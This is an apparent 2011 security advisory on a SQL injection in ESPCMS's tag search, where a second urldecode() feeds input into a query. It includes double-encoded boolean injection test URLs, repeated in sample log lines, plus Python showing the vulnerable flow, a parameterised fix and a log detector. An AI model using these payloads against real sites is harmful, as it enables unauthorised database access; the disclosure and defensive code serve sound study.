ESPCMS injection 0-day vulnerability warning - the Black Bar Safety Net

2011-03-09T00:00:00
ID MYHACK58:62201129664
Type myhack58
Reporter Anonymous
Modified 2011-03-09T00:00:00

Description

The result of urldecode() is used without filtering, which produces a SQL injection. Call chain: interface/search.php ----> in_taglist() ----> $tagkey (after urldecode() processing the value goes directly into the SQL statement, forming the injection; code omitted).

Test:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=1%23
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=2%23

Description: because the injected statement is executed twice in SQL within the same function, and the number of fields differs between the two queries, a UNION query is blocked.
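The mechanism above (a value that PHP has already decoded once into $_GET being passed through urldecode() a second time and spliced into SQL) is illustrated below in Python as an added example; it is not ESPCMS code. It assumes a one-time decode by the web layer, a hypothetical IN (...) query shape (the advisory omits the real code), an in-memory SQLite table standing in for the tag table, and constructed access-log lines. It shows the vulnerable flow beside a hardened lookup that skips the second decode and binds the tags as parameters, plus a detection check for double-encoded tagkey values.

```python
import sqlite3
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample data standing in for the CMS tag table (not ESPCMS's schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tags (name) VALUES (?)", [("dd",), ("news",)])
    return conn

def tagkey_from_url(url: str) -> str:
    """tagkey as PHP would place it in $_GET: exactly one URL decode (assumption)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("tagkey", [""])[0]

def vulnerable_sql(tagkey: str) -> str:
    """Mirrors the flow the advisory describes: urldecode() applied a second time,
    then the result concatenated into the SQL text. Hypothetical query shape."""
    decoded = unquote(tagkey)  # second decode: %27 (from %2527) becomes a quote
    quoted = ",".join("'" + t + "'" for t in decoded.split(","))
    return "SELECT id, name FROM tags WHERE name IN (" + quoted + ")"

def safe_lookup(conn: sqlite3.Connection, tagkey: str) -> list:
    """Hardened form: no second decode, and every tag is bound as a parameter,
    so encoded or quote-bearing input is matched as data, never parsed as SQL."""
    tags = [t for t in tagkey.split(",") if t]
    if not tags:
        return []
    placeholders = ",".join("?" * len(tags))
    rows = conn.execute(
        "SELECT id, name FROM tags WHERE name IN (" + placeholders + ") ORDER BY id",
        tags,
    ).fetchall()
    return [name for _, name in rows]

def is_double_encoded(tagkey: str) -> bool:
    """Detection heuristic: after the single decode the server already performed,
    a value that still carries an encoded quote, hash, space or dash pair was
    double-encoded by the client, which is what this bug class relies on."""
    if unquote(tagkey) == tagkey:
        return False
    lowered = tagkey.lower()
    return any(seq in lowered for seq in ("%27", "%22", "%23", "%20", "%2d%2d"))

def flag_requests(log_lines: list) -> list:
    """Return the log lines whose taglist request carries a double-encoded tagkey."""
    flagged = []
    for line in log_lines:
        path = line.split('"')[1].split()[1]          # request target of the log line
        if "at=taglist" in path and is_double_encoded(tagkey_from_url(path)):
            flagged.append(line)
    return flagged

# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Mar/2011:10:00:01 +0000] "GET /espcms/index.php?ac=search&at=taglist&tagkey=dd,news HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Mar/2011:10:00:07 +0000] "GET /espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=1%23 HTTP/1.1" 200 498',
    '10.0.0.9 - - [09/Mar/2011:10:00:09 +0000] "GET /espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=2%23 HTTP/1.1" 200 311',
]

if __name__ == "__main__":
    db = make_db()
    benign = tagkey_from_url("http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd,news")
    print("benign tags:", safe_lookup(db, benign))
    tampered = tagkey_from_url(SAMPLE_LOG[1].split('"')[1].split()[1])
    print("vulnerable SQL text:", vulnerable_sql(tampered))
    print("hardened lookup on same input:", safe_lookup(db, tampered))
    print("flagged log lines:", len(flag_requests(SAMPLE_LOG)))
```

The hardened lookup does not try to "clean" the input; it simply stops decoding where the web layer stopped and lets the database driver bind each tag, so the `1=1` fragment never becomes part of the query text. The detector is a heuristic for access logs: a legitimate client has no reason to send `%2527` for a tag name, so a tagkey that still contains encoded quote or comment sequences after one decode is a useful alert condition.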

Official website: http://www.ecisp.cn/html/cn/